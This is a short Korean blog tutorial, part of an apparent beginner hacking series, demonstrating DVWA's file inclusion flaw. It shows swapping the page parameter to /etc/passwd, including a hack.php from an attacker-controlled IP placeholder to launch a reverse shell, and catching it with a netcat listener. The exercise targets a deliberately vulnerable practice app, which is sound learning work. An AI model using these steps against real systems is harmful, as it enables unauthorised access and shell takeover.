저희는 웹 개발을 할 때 자주 쓰는 파일들을 만들어 두고 그 파일을 불러와 사용하는 경우가 있습니다. 예를 들면 아래 그림의 윗부분을 모든 페이지마다 만들려면 너무 힘듭니다. 만약 메뉴가 하나라도 추가되면 모든 페이지를 다 수정해 줘야 합니다. 이를 막기 위해 미리 메뉴를 만들어 두고 그 파일을 불러오는 것입니다.
그렇다면 불러오는 파일을 저희가 지정할 수 있다면 악성 코드를 실행할 수도 있을 것입니다. dvwa의 file inclusion으로 가봅시다. 위의 경로를 보면 page=include.php가 있는 것을 볼 수 있습니다.(물론 이렇게 대놓고 있는 경우는 없을 것입니다.)
include.php를 /etc/passwd로 바꿔 봅시다.
위에 유저 정보들이 쭉 나오는 것을 알 수 있습니다.
그럼 이 전에 만들어 둔 hack.php(https://codestudycafe.tistory.com/69)를 실행하도록 해봅시다.
터미널에서 service apache2 start를 실행해서 웹 서버를 실행해 줍니다. 그리고 /var/www/html 폴더로 이동해 줍니다.
이전에 만든 hack.php 파일을 현재 폴더로 가져옵니다.
이제 page=http://{공격자 ip}/hack.php를 입력하면 리버스 쉘 공격 파일이 실행됩니다.
공격자 컴퓨터 터미널에서 nc -nlvp 7777를 입력하면 쉘을 탈취할 수 있습니다.
'해킹 슈퍼 기초 연습' 카테고리의 다른 글
dvwa brute force (0) | 2024.07.21 |
---|---|
dvwa xss 공격 (0) | 2024.07.09 |
dvwa 파일 업로드 취약점 (0) | 2024.07.07 |
dvwa sql injection (0) | 2024.07.06 |
ip 위치 추적 (0) | 2024.06.29 |